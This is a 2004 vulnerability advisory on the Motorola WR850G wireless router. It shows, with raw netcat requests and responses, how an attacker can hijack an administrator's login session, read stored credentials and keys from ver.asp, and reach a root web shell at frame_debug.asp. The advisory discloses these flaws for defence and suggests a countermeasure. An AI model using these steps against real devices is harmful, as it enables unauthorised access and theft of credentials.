Motorola Wireless Router WR850G Authentication Circumvention

-------------------------------------------------------------------------

| Motorola Wireless Router WR850G Authentication Circumvention |

-------------------------------------------------------------------------

Date: 09-03-2004

Author: Daniel Fabian

Product: Motorola Wireless Router WR850G, Firmware v4.03

Vendor: Motorola (http://www.motorola.com)

Vendor-Status: vendor contacted (09-02-2004 and 09-09-2004)

Vendor-Patches: none available

~~~~~~~~

Synopsis

~~~~~~~~~~~~~~~~~~~~~~~~

The firmware of Motorola's wireless router WR850G features a flaw that

enables an attacker to

* log into the routers web interface without knowing username or

password,

* gain knowledge of the router's username and password after logging

in.

Additionally the firmware contains an easter egg that provides a user

with a root shell on the routers linux software. However this root shell

can only be opened after a successful authentication.

 

~~~~~~~~

Vendor Status

~~~~~~~~~~~~~~~~~~~~~~~~

The vendor has been contacted twice (09-02-2004 and 09-09-2004) but has

so far failed to respond to our inquiries. Therefor, a patch is not

yet available.

 

~~~~~~~~

Vulnerabilities

~~~~~~~~~~~~~~~~~~~~~~~~

 

Authentication Circumvention:

-----------------------------

Scope:

One limitation of the routers firmware is that only one system at a

time can be logged into the web interface. However it does not correctly

keep track of the currently logged in system, making it possible for an

attacker to log into the web interface without having to know a username

or a password.

Exploit:

All an attacker has to do is to periodically poll for a file on the

routers web server that can only be accessed when logged into the

router (most likely this is going to be the file /ver.asp; see the

second described vulnerability). The attacker will get 302 redirect

messages, as long as nobody is logged in. However as soon as someone

knowing the password (ie. the real system administrator) logs into the

web interface from a different system (might either be behind the router,

on in front of it), not the system administrator is granted access, but

the attacker.

Example:

server:/var/www/htdocs# nc 10.10.69.244 8080

GET /ver.asp HTTP/1.0

HTTP/1.0 302 Redirect

Server: httpd

Date: Thu, 02 Sep 2004 14:30:15 GMT

Location: redirect.asp

Content-Type: text/xml

Connection: close

[Administrator (on a different IP) successfully logs in]

server:/var/www/htdocs# nc 10.10.69.244 8080

GET /ver.asp HTTP/1.0

HTTP/1.0 200 Ok

Server: httpd

Date: Thu, 02 Sep 2004 14:32:37 GMT

Cache-Control: no-cache

Pragma: no-cache

Expires: 0

Content-Type: text/html

Connection: close

[snip content]

The administrator trying to log in gets the error message:

403 Only one login allowed

The existing client:192.168.107.58

He therefore knows that someone is tempering with his system, though.

 

Password Recovery

-----------------

Scope:

The routers web server contains a page named ver.asp that contains an

output of every single configuration switch of the router. Among those

switches are:

* Web Interface Username and Password

* WEP Encryption Keys

* SNMP Community String

* DDNS password

* ...

The page can only be accessed when logged into the web interface either

by knowing the username and password, or by using the method described

above.

 

Exploit:

server:/var/www/htdocs# nc 80.108.69.244 8080

GET /ver.asp HTTP/1.0

HTTP/1.0 200 Ok

Server: httpd

Date: Thu, 02 Sep 2004 13:40:09 GMT

Cache-Control: no-cache

Pragma: no-cache

Expires: 0

Content-Type: text/html

Connection: close

[A short excerpt of the output:]

Pmon Version: 9

Firmware version: 4.03, April.15, 2004

pptp_passwd=

http_username=admin

wl0_ssid=hugo

wl0_key1=a3b6d3351f

http_passwd=strictlysecret

wl_passphrase=tumbledry

radius_key=

SNMPCommunityOne=public

 

Easter Egg: Root Shell

----------------------

Additionally to the page ver.asp, the routers web server also contains

a page named frame_debug.asp that contains a web shell where a user

can execute any command on the routers software. The page can only be

accessed when logged into the web interface either by knowing the

username and password, or by using the method described

above.

Example:

#cat /proc/version

Linux version 2.4.20 (sparklan@localhost.localdomain) (gcc version 3.0

20010422 (prerelease) with bcm4710a0 modifications) #37 Thu Apr 15

16:34:09 CST 2004

#uptime

2:56pm up 7:33, load average: 0.59, 0.23, 0.09

#cat /proc/cpuinfo

system type : Broadcom BCM947XX

processor : 0

cpu model : BCM4710 V0.0

BogoMIPS : 82.94

wait instruction : no

microsecond timers : yes

tlb_entries : 32

extra interrupt vector : no

hardware watchpoint : no

VCED exceptions : not available

VCEI exceptions : not available

dcache hits : 3694025514

dcache misses : 3395654302

icache hits : 3303822179

icache misses : 3094738920

instructions : 2214575440

 

~~~~~~~~

Counter Measures

~~~~~~~~~~~~~~~~~~~~~~~~

Even though this does not resolve the vulnerability, the web interface

should be configured only to listen to LAN and not to WAN interfaces.

This at least eliminates the risk of being hacked from the outside, while

it is still possible for an insider to gain the passwords in the way

described above.

EOF Daniel Fabian / @2004

d.fabian at sec-consult dot com

~~~~~~~~

Contact

~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Unternehmensberatung GmbH

Büro Wien

Blindengasse 3

A-1080 Wien

Austria

Tel.: +43 / 1 / 409 0307 - 570

Fax.: +43 / 1 / 409 0307 - 590

Mail: office at sec-consult dot com

www.sec-consult.com